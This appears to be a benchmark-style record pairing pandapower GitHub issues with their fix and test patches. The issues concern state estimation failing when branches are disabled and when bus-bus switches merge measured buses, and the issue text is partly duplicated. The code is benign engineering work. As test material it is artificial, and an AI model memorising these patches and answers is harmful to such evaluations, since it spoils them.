meas_hv.std_dev.values * i_ka_to_pu_hv + branch_append[ix_hv, IM_FROM_IDX] = meas_hv.index.values + branch_append[ix_mv, IM_TO] = meas_mv.value.values * i_ka_to_pu_mv + branch_append[ix_mv, IM_TO_STD] = meas_mv.std_dev.values * i_ka_to_pu_mv + branch_append[ix_mv, IM_TO_IDX] = meas_mv.index.values + branch_append[ix_lv, IM_TO] = meas_lv.value.values * i_ka_to_pu_lv + branch_append[ix_lv, IM_TO_STD] = meas_lv.std_dev.values * i_ka_to_pu_lv + branch_append[ix_lv, IM_TO_IDX] = meas_lv.index.values + + p_tr3w_measurements = meas[(meas.measurement_type == "p") & (meas.element_type == "trafo3w") & + meas.element.isin(map_trafo3w)] + if len(p_tr3w_measurements): + meas_hv = p_tr3w_measurements[(p_tr3w_measurements.side.values.astype(int) == + net.trafo3w.hv_bus[p_tr3w_measurements.element]).values] + meas_mv = p_tr3w_measurements[(p_tr3w_measurements.side.values.astype(int) == + net.trafo3w.mv_bus[p_tr3w_measurements.element]).values] + meas_lv = p_tr3w_measurements[(p_tr3w_measurements.side.values.astype(int) == + net.trafo3w.lv_bus[p_tr3w_measurements.element]).values] + ix_hv = [map_trafo3w[t]['hv'] for t in meas_hv.element.values.astype(int)] + ix_mv = [map_trafo3w[t]['mv'] for t in meas_mv.element.values.astype(int)] + ix_lv = [map_trafo3w[t]['lv'] for t in meas_lv.element.values.astype(int)] + branch_append[ix_hv, P_FROM] = meas_hv.value.values + branch_append[ix_hv, P_FROM_STD] = meas_hv.std_dev.values + branch_append[ix_hv, P_FROM_IDX] = meas_hv.index.values + branch_append[ix_mv, P_TO] = meas_mv.value.values + branch_append[ix_mv, P_TO_STD] = meas_mv.std_dev.values + branch_append[ix_mv, P_TO_IDX] = meas_mv.index.values + branch_append[ix_lv, P_TO] = meas_lv.value.values + branch_append[ix_lv, P_TO_STD] = meas_lv.std_dev.values + branch_append[ix_lv, P_TO_IDX] = meas_lv.index.values + + q_tr3w_measurements = meas[(meas.measurement_type == "q") & (meas.element_type == "trafo3w") & + meas.element.isin(map_trafo3w)] + if len(q_tr3w_measurements): + meas_hv = q_tr3w_measurements[(q_tr3w_measurements.side.values.astype(int) == + net.trafo3w.hv_bus[q_tr3w_measurements.element]).values] + meas_mv = q_tr3w_measurements[(q_tr3w_measurements.side.values.astype(int) == + net.trafo3w.mv_bus[q_tr3w_measurements.element]).values] + meas_lv = q_tr3w_measurements[(q_tr3w_measurements.side.values.astype(int) == + net.trafo3w.lv_bus[q_tr3w_measurements.element]).values] + ix_hv = [map_trafo3w[t]['hv'] for t in meas_hv.element.values.astype(int)] + ix_mv = [map_trafo3w[t]['mv'] for t in meas_mv.element.values.astype(int)] + ix_lv = [map_trafo3w[t]['lv'] for t in meas_lv.element.values.astype(int)] + branch_append[ix_hv, Q_FROM] = meas_hv.value.values + branch_append[ix_hv, Q_FROM_STD] = meas_hv.std_dev.values + branch_append[ix_hv, Q_FROM_IDX] = meas_hv.index.values + branch_append[ix_mv, Q_TO] = meas_mv.value.values + branch_append[ix_mv, Q_TO_STD] = meas_mv.std_dev.values + branch_append[ix_mv, Q_TO_IDX] = meas_mv.index.values + branch_append[ix_lv, Q_TO] = meas_lv.value.values + branch_append[ix_lv, Q_TO_STD] = meas_lv.std_dev.values + branch_append[ix_lv, Q_TO_IDX] = meas_lv.index.values ppci["bus"] = np.hstack((ppci["bus"], bus_append)) ppci["branch"] = np.hstack((ppci["branch"], branch_append))
diff --git a/pandapower/test/estimation/test_wls_estimation.py b/pandapower/test/estimation/test_wls_estimation.py --- a/pandapower/test/estimation/test_wls_estimation.py +++ b/pandapower/test/estimation/test_wls_estimation.py @@ -585,6 +585,49 @@ def test_network_with_trafo3w_pq(): assert success assert (np.nanmax(np.abs(net.res_bus.vm_pu.values - net.res_bus_est.vm_pu.values)) < 0.006) assert (np.nanmax(np.abs(net.res_bus.va_degree.values- net.res_bus_est.va_degree.values)) < 0.006) + + +def test_network_with_trafo3w_with_disabled_branch(): + net = pp.create_empty_network() + + bus_slack = pp.create_bus(net, vn_kv=110) + pp.create_ext_grid(net, bus=bus_slack) + + bus_20_1 = pp.create_bus(net, vn_kv=20,name="b") + pp.create_sgen(net, bus=bus_20_1, p_mw=0.03, q_mvar=0.02) + + bus_10_1 = pp.create_bus(net, vn_kv=10) + pp.create_sgen(net, bus=bus_10_1, p_mw=0.02, q_mvar=0.02) + + bus_10_2 = pp.create_bus(net, vn_kv=10) + pp.create_load(net, bus=bus_10_2, p_mw=0.06, q_mvar=0.01) + pp.create_line(net, from_bus=bus_10_1, to_bus=bus_10_2, std_type="149-AL1/24-ST1A 10.0", length_km=2) + disabled_line = pp.create_line(net, from_bus=bus_10_1, to_bus=bus_10_2, std_type="149-AL1/24-ST1A 10.0", length_km=2) + net.line.at[disabled_line, 'in_service'] = False + + pp.create_transformer3w(net, bus_slack, bus_20_1, bus_10_1, std_type="63/25/38 MVA 110/20/10 kV") + + pp.runpp(net) + + pp.create_measurement(net, "p", "line", net.res_line.p_from_mw[0], 0.001, 0, 'from') + pp.create_measurement(net, "q", "line", net.res_line.q_from_mvar[0], 0.001, 0, 'from') + pp.create_measurement(net, "p", "line", net.res_line.p_to_mw[0], 0.001, 0, 'to') + pp.create_measurement(net, "q", "line", net.res_line.q_to_mvar[0], 0.001, 0, 'to') + + pp.create_measurement(net, "p", "trafo3w", net.res_trafo3w.p_hv_mw[0], 0.001, 0, 'hv') + pp.create_measurement(net, "q", "trafo3w", net.res_trafo3w.q_hv_mvar[0], 0.001, 0, 'hv') + pp.create_measurement(net, "p", "trafo3w", net.res_trafo3w.p_mv_mw[0], 0.002, 0, 'mv') + pp.create_measurement(net, "q", "trafo3w", net.res_trafo3w.q_mv_mvar[0], 0.002, 0, 'mv') + pp.create_measurement(net, "p", "trafo3w", net.res_trafo3w.p_lv_mw[0], 0.001, 0, 'lv') + pp.create_measurement(net, "q", "trafo3w", net.res_trafo3w.q_lv_mvar[0], 0.001, 0, 'lv') + + pp.create_measurement(net, "v", "bus", net.res_bus.vm_pu[0], 0.01, 0) + pp.create_measurement(net, "v", "bus", net.res_bus.vm_pu[1], 0.01, 1) + + success = estimate(net) + assert success + assert (np.nanmax(np.abs(net.res_bus.vm_pu.values - net.res_bus_est.vm_pu.values)) < 0.006) + assert (np.nanmax(np.abs(net.res_bus.va_degree.values- net.res_bus_est.va_degree.values)) < 0.006) def r(v=0.03):
State estimation module error when net has disabled branches Hi, i came across a bug in the state estimation module, when I run the following code for the new functionality for trafo3w added in 5234059ca65a6c8e1bdb27ddbbd57cceb620a960 . The net was modified with one disabled line. The reason seems to be that, the branch mapping from pp to ppci will change if some branches were disabled or connected between two disabled buses. ``` import pandapower as pp from pandapower.estimation import estimate net = pp.create_empty_network() bus_slack = pp.create_bus(net, vn_kv=110) pp.create_ext_grid(net, bus=bus_slack) bus_20_1 = pp.create_bus(net, vn_kv=20,name="b") pp.create_sgen(net, bus=bus_20_1, p_mw=0.03, q_mvar=0.02) bus_10_1 = pp.create_bus(net, vn_kv=10) pp.create_sgen(net, bus=bus_10_1, p_mw=0.02, q_mvar=0.02) bus_10_2 = pp.create_bus(net, vn_kv=10) pp.create_load(net, bus=bus_10_2, p_mw=0.06, q_mvar=0.01) pp.create_line(net, from_bus=bus_10_1, to_bus=bus_10_2, std_type="149-AL1/24-ST1A 10.0", length_km=2) disabled_line = pp.create_line(net, from_bus=bus_10_1, to_bus=bus_10_2, std_type="149-AL1/24-ST1A 10.0", length_km=2) net.line.at[disabled_line, 'in_service'] = False pp.create_transformer3w(net, bus_slack, bus_20_1, bus_10_1, std_type="63/25/38 MVA 110/20/10 kV") pp.runpp(net) pp.create_measurement(net, "p", "line", net.res_line.p_from_mw[0], 0.001, 0, 'from') pp.create_measurement(net, "q", "line", net.res_line.q_from_mvar[0], 0.001, 0, 'from') pp.create_measurement(net, "p", "line", net.res_line.p_to_mw[0], 0.001, 0, 'to') pp.create_measurement(net, "q", "line", net.res_line.q_to_mvar[0], 0.001, 0, 'to') pp.create_measurement(net, "p", "trafo3w", net.res_trafo3w.p_hv_mw[0], 0.001, 0, 'hv') pp.create_measurement(net, "q", "trafo3w", net.res_trafo3w.q_hv_mvar[0], 0.001, 0, 'hv') pp.create_measurement(net, "p", "trafo3w", net.res_trafo3w.p_mv_mw[0], 0.002, 0, 'mv') pp.create_measurement(net, "q", "trafo3w", net.res_trafo3w.q_mv_mvar[0], 0.002, 0, 'mv') pp.create_measurement(net, "p", "trafo3w", net.res_trafo3w.p_lv_mw[0], 0.001, 0, 'lv') pp.create_measurement(net, "q", "trafo3w", net.res_trafo3w.q_lv_mvar[0], 0.001, 0, 'lv') pp.create_measurement(net, "v", "bus", net.res_bus.vm_pu[0], 0.01, 0) pp.create_measurement(net, "v", "bus", net.res_bus.vm_pu[1], 0.01, 1) success = estimate(net) ```
2018-12-18T09:11:11
e2nIEE/pandapower
258
e2nIEE__pandapower-258
[ "253", "253" ]
d6226e3022cb8e10a40f2d889825058a4a803362
diff --git a/pandapower/estimation/state_estimation.py b/pandapower/estimation/state_estimation.py --- a/pandapower/estimation/state_estimation.py +++ b/pandapower/estimation/state_estimation.py @@ -9,7 +9,7 @@ from scipy.stats import chi2 from pandapower.estimation.wls_ppc_conversions import _add_measurements_to_ppc, \ - _build_measurement_vectors, _init_ppc + _build_measurement_vectors, _init_ppc, _add_aux_elements_for_bb_switch, _drop_aux_elements_for_bb_switch from pandapower.estimation.results import _copy_power_flow_results, _rename_results from pandapower.idx_brch import F_BUS, T_BUS, BR_STATUS, PF, PT, QF, QT from pandapower.auxiliary import _add_pf_options, get_values, _clean_up @@ -27,7 +27,7 @@ def estimate(net, init='flat', tolerance=1e-6, maximum_iterations=10, - calculate_voltage_angles=True): + calculate_voltage_angles=True, fuse_all_bb_switches=True): """ Wrapper function for WLS state estimation. @@ -46,6 +46,11 @@ def estimate(net, init='flat', tolerance=1e-6, maximum_iterations=10, **calculate_voltage_angles** - (boolean) - Take into account absolute voltage angles and phase shifts in transformers, if init is 'slack'. Default is True. + + **fuse_all_bb_switches** - (bool) - if true when considering bus-bus-switches the buses + will fused (Default behaviour) otherwise auxiliary lines will be added between those buses + where an element is connected to them in order to clear the p,q results on each buses + instead of fusing them all together OUTPUT: **successful** (boolean) - Was the state estimation successful? @@ -63,7 +68,7 @@ def estimate(net, init='flat', tolerance=1e-6, maximum_iterations=10, delta_start = res_bus.va_degree.values elif init != 'flat': raise UserWarning("Unsupported init value. Using flat initialization.") - return wls.estimate(v_start, delta_start, calculate_voltage_angles) + return wls.estimate(v_start, delta_start, calculate_voltage_angles, fuse_all_bb_switches) def remove_bad_data(net, init='flat', tolerance=1e-6, maximum_iterations=10, @@ -186,7 +191,7 @@ def __init__(self, tolerance=1e-6, maximum_iterations=10, net=None, logger=None) self.delta = None self.bad_data_present = None - def estimate(self, v_start=None, delta_start=None, calculate_voltage_angles=True): + def estimate(self, v_start=None, delta_start=None, calculate_voltage_angles=True, fuse_all_bb_switches=True): """ The function estimate is the main function of the module. It takes up to three input arguments: v_start, delta_start and calculate_voltage_angles. The first two are the initial @@ -214,6 +219,11 @@ def estimate(self, v_start=None, delta_start=None, calculate_voltage_angles=True OPTIONAL: **calculate_voltage_angles** - (bool) - Take into account absolute voltage angles and phase shifts in transformers Default is True. + + **fuse_all_bb_switches** - (bool) - if true when considering bus-bus-switches the buses + will fused (Default behaviour) otherwise auxiliary lines will be added between those buses + where an element is connected to them in order to clear the p,q results on each buses + instead of fusing them all together OUTPUT: **successful** (boolean) - True if the estimation process was successful @@ -229,6 +239,12 @@ def estimate(self, v_start=None, delta_start=None, calculate_voltage_angles=True if self.net is None: raise UserWarning("Component was not initialized with a network.") t0 = time() + + # change the configuration of the pp net to avoid auto fusing of buses connected + # through bb switch with elements on each bus if this feature enabled + if not fuse_all_bb_switches and not self.net.switch.empty: + _add_aux_elements_for_bb_switch(self.net) + # add initial values for V and delta # node voltages # V<delta @@ -369,6 +385,9 @@ def estimate(self, v_start=None, delta_start=None, calculate_voltage_angles=True mapping_table) _clean_up(self.net) + # clear the aux elements and calculation results created for the substitution of bb switches + if not fuse_all_bb_switches and not self.net.switch.empty: + _drop_aux_elements_for_bb_switch(self.net) # store variables required for chi^2 and r_N_max test: self.R_inv = r_inv.toarray() diff --git a/pandapower/estimation/wls_ppc_conversions.py b/pandapower/estimation/wls_ppc_conversions.py --- a/pandapower/estimation/wls_ppc_conversions.py +++ b/pandapower/estimation/wls_ppc_conversions.py @@ -5,6 +5,7 @@ import numpy as np +import pandas as pd from pandapower.auxiliary import _select_is_elements_numba, _add_ppc_options, _add_auxiliary_elements from pandapower.pd2ppc import _pd2ppc from pandapower.estimation.idx_bus import * @@ -13,6 +14,7 @@ from pandapower.idx_bus import bus_cols from pandapower.pf.run_newton_raphson_pf import _run_dc_pf from pandapower.build_branch import get_is_lines +from pandapower.create import create_buses, create_line_from_parameters try: import pplog as logging @@ -20,6 +22,92 @@ import logging std_logger = logging.getLogger(__name__) +AUX_BUS_NAME, AUX_LINE_NAME, AUX_SWITCH_NAME =\ + "aux_bus_se", "aux_line_se", "aux_bbswitch_se" + +def _add_aux_elements_for_bb_switch(net): + """ + Add auxiliary elements (bus, bb switch, line) to the pandapower net to avoid + automatic fuse of buses connected with bb switch with elements on it + :param net: pandapower net + :return: None + """ + def get_bus_branch_mapping(net): + bus_with_elements = set(net.load.bus).union(set(net.sgen.bus)).union( + set(net.shunt.bus)).union(set(net.gen.bus)).union( + set(net.ext_grid.bus)).union(set(net.ward.bus)).union( + set(net.xward.bus)) + + bus_ppci = pd.DataFrame(data=net._pd2ppc_lookups['bus'], columns=["bus_ppci"]) + bus_ppci['bus_with_elements'] = bus_ppci.index.isin(bus_with_elements) + bus_ppci['vn_kv'] = net.bus.loc[bus_ppci.index, 'vn_kv'] + ppci_bus_with_elements = bus_ppci.groupby('bus_ppci')['bus_with_elements'].sum() + bus_ppci.loc[:, 'elements_in_cluster'] = ppci_bus_with_elements[bus_ppci['bus_ppci'].values].values + return bus_ppci + + # find the buses which was fused together in the pp2ppc conversion with elements on them + # the first one will be skipped + _pd2ppc(net) + bus_ppci_mapping = get_bus_branch_mapping(net) + bus_to_be_handled = bus_ppci_mapping[((bus_ppci_mapping ['elements_in_cluster']>=2)&\ + bus_ppci_mapping ['bus_with_elements'])] + bus_to_be_handled = bus_to_be_handled[bus_to_be_handled['bus_ppci'].duplicated(keep='first')] + + # create auxiliary buses for the buses need to be handled + aux_bus_index = create_buses(net, bus_to_be_handled.shape[0], bus_to_be_handled.vn_kv.values, + name=AUX_BUS_NAME) + bus_aux_mapping = pd.Series(aux_bus_index, index=bus_to_be_handled.index.values) + + # create auxiliary switched and disable original switches connected to the related buses + net.switch.loc[:, 'original_closed'] = net.switch.loc[:, 'closed'] + switch_to_be_replaced_sel = ((net.switch.et == 'b') & + (net.switch.element.isin(bus_to_be_handled.index) | + net.switch.bus.isin(bus_to_be_handled.index))) + net.switch.loc[switch_to_be_replaced_sel, 'closed'] = False + + # create aux switches with selecting the existed switches + aux_switch = net.switch.loc[switch_to_be_replaced_sel, ['bus', 'closed', 'element', + 'et', 'name', 'original_closed']] + aux_switch.loc[:,'name'] = AUX_SWITCH_NAME + + # replace the original bus with the correspondent auxiliary bus + bus_to_be_replaced = aux_switch.loc[aux_switch.bus.isin(bus_to_be_handled.index), 'bus'] + element_to_be_replaced = aux_switch.loc[aux_switch.element.isin(bus_to_be_handled.index), 'element'] + aux_switch.loc[bus_to_be_replaced.index, 'bus'] =\ + bus_aux_mapping[bus_to_be_replaced].values + aux_switch.loc[element_to_be_replaced.index, 'element'] =\ + bus_aux_mapping[element_to_be_replaced].values + aux_switch['closed'] = aux_switch['original_closed'] + net.switch = net.switch.append(aux_switch, ignore_index=True) + + # create auxiliary lines as small impedance + for bus_ori, bus_aux in bus_aux_mapping.iteritems(): + create_line_from_parameters(net, bus_ori, bus_aux, length_km=1e-5, name=AUX_LINE_NAME, + r_ohm_per_km=0.15, x_ohm_per_km=0.2, c_nf_per_km=10, max_i_ka=1) + + +def _drop_aux_elements_for_bb_switch(net): + """ + Remove auxiliary elements (bus, bb switch, line) added by + _add_aux_elements_for_bb_switch function + :param net: pandapower net + :return: None + """ + # Remove auxiliary switches and restore switch status + net.switch = net.switch[net.switch.name!=AUX_SWITCH_NAME] + if 'original_closed' in net.switch.columns: + net.switch.loc[:, 'closed'] = net.switch.loc[:, 'original_closed'] + net.switch.drop('original_closed', axis=1, inplace=True) + + # Remove auxiliary buses, lines in net and result + for key in net.keys(): + if key.startswith('res_bus'): + net[key] = net[key].loc[net.bus.name != AUX_BUS_NAME, :] + if key.startswith('res_line'): + net[key] = net[key].loc[net.line.name != AUX_LINE_NAME, :] + net.bus = net.bus.loc[net.bus.name != AUX_BUS_NAME, :] + net.line = net.line.loc[net.line.name != AUX_LINE_NAME, :] + def _init_ppc(net, v_start, delta_start, calculate_voltage_angles): # select elements in service and convert pandapower ppc to ppc
diff --git a/pandapower/test/estimation/test_wls_estimation.py b/pandapower/test/estimation/test_wls_estimation.py --- a/pandapower/test/estimation/test_wls_estimation.py +++ b/pandapower/test/estimation/test_wls_estimation.py @@ -628,6 +628,55 @@ def test_network_with_trafo3w_with_disabled_branch(): assert success assert (np.nanmax(np.abs(net.res_bus.vm_pu.values - net.res_bus_est.vm_pu.values)) < 0.006) assert (np.nanmax(np.abs(net.res_bus.va_degree.values- net.res_bus_est.va_degree.values)) < 0.006) + + +def test_net_with_bb_switch(): + net = pp.create_empty_network() + pp.create_bus(net, name="bus1", vn_kv=10.) + pp.create_bus(net, name="bus2", vn_kv=10.) + pp.create_bus(net, name="bus3", vn_kv=10.) + pp.create_bus(net, name="bus4", vn_kv=110.) + pp.create_ext_grid(net, bus=3, vm_pu=1.0) + pp.create_line_from_parameters(net, 0, 1, 10, r_ohm_per_km=.59, x_ohm_per_km=.35, c_nf_per_km=10.1, + max_i_ka=1) + pp.create_transformer(net, 3, 0, std_type="40 MVA 110/10 kV") + + pp.create_load(net, 0, p_mw=.350, q_mvar=.100) + pp.create_load(net, 1, p_mw=.450, q_mvar=.100) + pp.create_load(net, 2, p_mw=.250, q_mvar=.100) + + # Created bb switch + pp.create_switch(net, 1, element=2, et='b') + pp.runpp(net, calculate_voltage_angles=True) + + pp.create_measurement(net, "v", "bus", r2(net.res_bus.vm_pu.iloc[0], .002), .002, element=0) + pp.create_measurement(net, "v", "bus", r2(net.res_bus.vm_pu.iloc[1], .002), .002, element=1) + pp.create_measurement(net, "v", "bus", r2(net.res_bus.vm_pu.iloc[3], .002), .002, element=3) + + pp.create_measurement(net, "p", "bus", -r2(net.res_bus.p_mw.iloc[3], .002), .002, element=3) + pp.create_measurement(net, "q", "bus", -r2(net.res_bus.q_mvar.iloc[3], .002), .002, element=3) + + # If measurement on the bus with bb-switch activated, it will incluence the results of the merged bus + pp.create_measurement(net, "p", "bus", -r2(net.res_bus.p_mw.iloc[2], .001), .001, element=2) + pp.create_measurement(net, "q", "bus", -r2(net.res_bus.q_mvar.iloc[2], .001), .001, element=2) + pp.create_measurement(net, "p", "bus", -r2(net.res_bus.p_mw.iloc[1], .001), .001, element=1) + pp.create_measurement(net, "q", "bus", -r2(net.res_bus.q_mvar.iloc[1], .001), .001, element=1) + + pp.create_measurement(net, "p", "line", r2(net.res_line.p_from_mw.iloc[0], .002), .002, 0, side='from') + pp.create_measurement(net, "q", "line", r2(net.res_line.q_from_mvar.iloc[0], .002), .002, 0, side='from') + + pp.create_measurement(net, "p", "trafo", r2(net.res_trafo.p_hv_mw.iloc[0], .001), .01, + side="hv", element=0) + pp.create_measurement(net, "q", "trafo", r2(net.res_trafo.q_hv_mvar.iloc[0], .001), .01, + side="hv", element=0) + + success = estimate(net, tolerance=1e-5, fuse_all_bb_switches=False) + assert success + assert np.allclose(net.res_bus.va_degree.values,net.res_bus_est.va_degree.values, 1e-2) + assert np.allclose(net.res_bus.vm_pu.values,net.res_bus_est.vm_pu.values, 1e-2) + # asserting with more tolerance since the added impedance will cause some inaccuracy + assert np.allclose(net.res_bus.p_mw.values,net.res_bus_est.p_mw.values, atol=1e-2) + assert np.allclose(net.res_bus.q_mvar.values,net.res_bus_est.q_mvar.values, atol=1e-2) def r(v=0.03):
State estimation error with bus-bus switches and measurements on each bus Hi, i am currently working on a high voltage network with lots of measurements. The bus of the pandapower network represents a busbar in the substation in the real world and the buses were connected with each other through bus-bus switches. The measurement of bus (p, q) represents the power flow on a busbar. However the state estimation module (and similarly in power flow calculation) will merge the buses connected through bb-switch to a single bus and which was not in the _add_measurement function the measurement correctly merged. I have tried to connect the bus with measurement (and also load or sgens) with lines instead of bb-switches as small impedance. This might be a possibility to solve the issue. However it will be better to leave this subsititution to minimum. The code for test with a simple four bus network: ```python import numpy as np from copy import deepcopy import pandapower as pp import pandapower.networks as pn from pandapower.estimation import estimate as se def r2(base, v): return np.random.normal(base, v) # 1. Create network net = pp.create_empty_network() pp.create_bus(net, name="bus1", vn_kv=10.) pp.create_bus(net, name="bus2", vn_kv=10.) pp.create_bus(net, name="bus3", vn_kv=10.) pp.create_bus(net, name="bus4", vn_kv=110.) pp.create_ext_grid(net, bus=3, vm_pu=1.01) pp.create_line_from_parameters(net, 0, 1, 10, r_ohm_per_km=.59, x_ohm_per_km=.35, c_nf_per_km=10.1, max_i_ka=1) pp.create_line_from_parameters(net, 0, 2, 10, r_ohm_per_km=.59, x_ohm_per_km=.35, c_nf_per_km=10.1, max_i_ka=1) pp.create_line_from_parameters(net, 1, 2, 10, r_ohm_per_km=.59, x_ohm_per_km=.35, c_nf_per_km=10.1, max_i_ka=1) pp.create_transformer(net, 3, 0, std_type="40 MVA 110/10 kV") pp.create_load(net, 0, .350, .100) pp.create_load(net, 1, .450, .200) pp.create_load(net, 2, .250, .100) # Created bb switch and the line will be short circuited (ignored) pp.create_switch(net, 1, element=2, et='b') net_meas_on_bb_bus = deepcopy(net) net_switch_as_impedance = deepcopy(net) net_switch_as_impedance.switch.at[0 ,"closed"] = False net_switch_as_impedance.line.at[2, 'length_km'] /= 1000 net_switch_as_impedance_with_meas = deepcopy(net_switch_as_impedance) pp.runpp(net) pp.runpp(net_meas_on_bb_bus) pp.runpp(net_switch_as_impedance) pp.runpp(net_switch_as_impedance_with_meas) def create_test_measurement(net, measurement_on_bb_switch_bus=False): pp.create_measurement(net, "v", "bus", r2(net.res_bus.vm_pu.iloc[0], .004), .004, element=0) pp.create_measurement(net, "v", "bus", r2(net.res_bus.vm_pu.iloc[1], .004), .004, element=1) pp.create_measurement(net, "v", "bus", r2(net.res_bus.vm_pu.iloc[3], .004), .004, element=3) pp.create_measurement(net, "p", "bus", -r2(net.res_bus.p_mw.iloc[3], .002), .004, element=3) pp.create_measurement(net, "q", "bus", -r2(net.res_bus.q_mvar.iloc[3], .002), .004, element=3) ## If measurement on the bus with bb-switch activated, it will incluence the results of the merged bus if measurement_on_bb_switch_bus: pp.create_measurement(net, "p", "bus", -r2(net.res_bus.p_mw.iloc[2], .002), .004, element=2) pp.create_measurement(net, "q", "bus", -r2(net.res_bus.q_mvar.iloc[2], .002), .004, element=2) pp.create_measurement(net, "p", "line", r2(net.res_line.p_from_mw.iloc[0], .001), .002, 0, side='from') pp.create_measurement(net, "q", "line", r2(net.res_line.q_from_mvar.iloc[0], .001), .002, 0, side='from') pp.create_measurement(net, "p", "line", r2(net.res_line.p_from_mw.iloc[1], .001), .002, 1, side='from') pp.create_measurement(net, "q", "line", r2(net.res_line.q_from_mvar.iloc[1], .001), .002, 1, side='from') pp.create_measurement(net, "p", "trafo", r2(net.res_trafo.p_hv_mw.iloc[0], .002), .01, side="hv", element=0) # transformer meas. pp.create_measurement(net, "q", "trafo", r2(net.res_trafo.q_hv_mvar.iloc[0], .002), .01, side=3, element=0) # at hv side create_test_measurement(net) create_test_measurement(net_switch_as_impedance) create_test_measurement(net_meas_on_bb_bus, True) create_test_measurement(net_switch_as_impedance_with_meas, True) # 2. Do state estimation success_net = se(net, tolerance=1e-5, maximum_iterations=20) success_net_meas_on_bb_bus = se(net_meas_on_bb_bus, tolerance=1e-5, maximum_iterations=20) success_net_with_impedance = se(net_switch_as_impedance, tolerance=1e-5, maximum_iterations=20) success_impedance_with_meas = se(net_switch_as_impedance_with_meas, tolerance=1e-5, maximum_iterations=20) res_bus_with_switch = net.res_bus_est res_bus_meas_on_bb_bus = net_meas_on_bb_bus.res_bus_est res_bus_small_impedance = net_switch_as_impedance.res_bus_est res_bus_small_impedance_with_meas = net_switch_as_impedance_with_meas.res_bus_est ``` The network has the following variations: - original - bb: using bb-switch between bus 1, 2 - imp: using small impedance instead of bb-switch between bus 1,2 - bb+meas: using bb-switch and has p, q measurement on one of the buses with bb-switch - imp+meas: using small impedance and has p, q measurement on one of the buses P_mw injections on buses: | bus id | Original| bb | imp | bb+meas | imp+meas | |--|--|--|--|--|--| | 0 | 0.35 | 0.35 | 0.35 | 0.43| 0.35 | | 1 | 0.45 | 0.7 | 0.05 | 0.62 | 0.45 | | 2 | 0.25 | 0.7 | 0.65 | 0.62 | 0.25 | | 3 | -1.09 | -1.09 | -1.08 | -1.09 | -1.08 | From the result, it seems like that small impedance with measurements delivers the best result. And if the network has bb-switch, the state estimation module seems fail to identify the buses, since it's automatically merged to one bus in ppc. State estimation error with bus-bus switches and measurements on each bus Hi, i am currently working on a high voltage network with lots of measurements. The bus of the pandapower network represents a busbar in the substation in the real world and the buses were connected with each other through bus-bus switches. The measurement of bus (p, q) represents the power flow on a busbar. However the state estimation module (and similarly in power flow calculation) will merge the buses connected through bb-switch to a single bus and which was not in the _add_measurement function the measurement correctly merged. I have tried to connect the bus with measurement (and also load or sgens) with lines instead of bb-switches as small impedance. This might be a possibility to solve the issue. However it will be better to leave this subsititution to minimum. The code for test with a simple four bus network: ```python import numpy as np from copy import deepcopy import pandapower as pp import pandapower.networks as pn from pandapower.estimation import estimate as se def r2(base, v): return np.random.normal(base, v) # 1. Create network net = pp.create_empty_network() pp.create_bus(net, name="bus1", vn_kv=10.) pp.create_bus(net, name="bus2", vn_kv=10.) pp.create_bus(net, name="bus3", vn_kv=10.) pp.create_bus(net, name="bus4", vn_kv=110.) pp.create_ext_grid(net, bus=3, vm_pu=1.01) pp.create_line_from_parameters(net, 0, 1, 10, r_ohm_per_km=.59, x_ohm_per_km=.35, c_nf_per_km=10.1, max_i_ka=1) pp.create_line_from_parameters(net, 0, 2, 10, r_ohm_per_km=.59, x_ohm_per_km=.35, c_nf_per_km=10.1, max_i_ka=1) pp.create_line_from_parameters(net, 1, 2, 10, r_ohm_per_km=.59, x_ohm_per_km=.35, c_nf_per_km=10.1, max_i_ka=1) pp.create_transformer(net, 3, 0, std_type="40 MVA 110/10 kV") pp.create_load(net, 0, .350, .100) pp.create_load(net, 1, .450, .200) pp.create_load(net, 2, .250, .100) # Created bb switch and the line will be short circuited (ignored) pp.create_switch(net, 1, element=2, et='b') net_meas_on_bb_bus = deepcopy(net) net_switch_as_impedance = deepcopy(net) net_switch_as_impedance.switch.at[0 ,"closed"] = False net_switch_as_impedance.line.at[2, 'length_km'] /= 1000 net_switch_as_impedance_with_meas = deepcopy(net_switch_as_impedance) pp.runpp(net) pp.runpp(net_meas_on_bb_bus) pp.runpp(net_switch_as_impedance) pp.runpp(net_switch_as_impedance_with_meas) def create_test_measurement(net, measurement_on_bb_switch_bus=False): pp.create_measurement(net, "v", "bus", r2(net.res_bus.vm_pu.iloc[0], .004), .004, element=0) pp.create_measurement(net, "v", "bus", r2(net.res_bus.vm_pu.iloc[1], .004), .004, element=1) pp.create_measurement(net, "v", "bus", r2(net.res_bus.vm_pu.iloc[3], .004), .004, element=3) pp.create_measurement(net, "p", "bus", -r2(net.res_bus.p_mw.iloc[3], .002), .004, element=3) pp.create_measurement(net, "q", "bus", -r2(net.res_bus.q_mvar.iloc[3], .002), .004, element=3) ## If measurement on the bus with bb-switch activated, it will incluence the results of the merged bus if measurement_on_bb_switch_bus: pp.create_measurement(net, "p", "bus", -r2(net.res_bus.p_mw.iloc[2], .002), .004, element=2) pp.create_measurement(net, "q", "bus", -r2(net.res_bus.q_mvar.iloc[2], .002), .004, element=2) pp.create_measurement(net, "p", "line", r2(net.res_line.p_from_mw.iloc[0], .001), .002, 0, side='from') pp.create_measurement(net, "q", "line", r2(net.res_line.q_from_mvar.iloc[0], .001), .002, 0, side='from') pp.create_measurement(net, "p", "line", r2(net.res_line.p_from_mw.iloc[1], .001), .002, 1, side='from') pp.create_measurement(net, "q", "line", r2(net.res_line.q_from_mvar.iloc[1], .001), .002, 1, side='from') pp.create_measurement(net, "p", "trafo", r2(net.res_trafo.p_hv_mw.iloc[0], .002), .01, side="hv", element=0) # transformer meas. pp.create_measurement(net, "q", "trafo", r2(net.res_trafo.q_hv_mvar.iloc[0], .002), .01, side=3, element=0) # at hv side create_test_measurement(net) create_test_measurement(net_switch_as_impedance) create_test_measurement(net_meas_on_bb_bus, True) create_test_measurement(net_switch_as_impedance_with_meas, True) # 2. Do state estimation success_net = se(net, tolerance=1e-5, maximum_iterations=20) success_net_meas_on_bb_bus = se(net_meas_on_bb_bus, tolerance=1e-5, maximum_iterations=20) success_net_with_impedance = se(net_switch_as_impedance, tolerance=1e-5, maximum_iterations=20) success_impedance_with_meas = se(net_switch_as_impedance_with_meas, tolerance=1e-5, maximum_iterations=20) res_bus_with_switch = net.res_bus_est res_bus_meas_on_bb_bus = net_meas_on_bb_bus.res_bus_est res_bus_small_impedance = net_switch_as_impedance.res_bus_est res_bus_small_impedance_with_meas = net_switch_as_impedance_with_meas.res_bus_est ``` The network has the following variations: - original - bb: using bb-switch between bus 1, 2 - imp: using small impedance instead of bb-switch 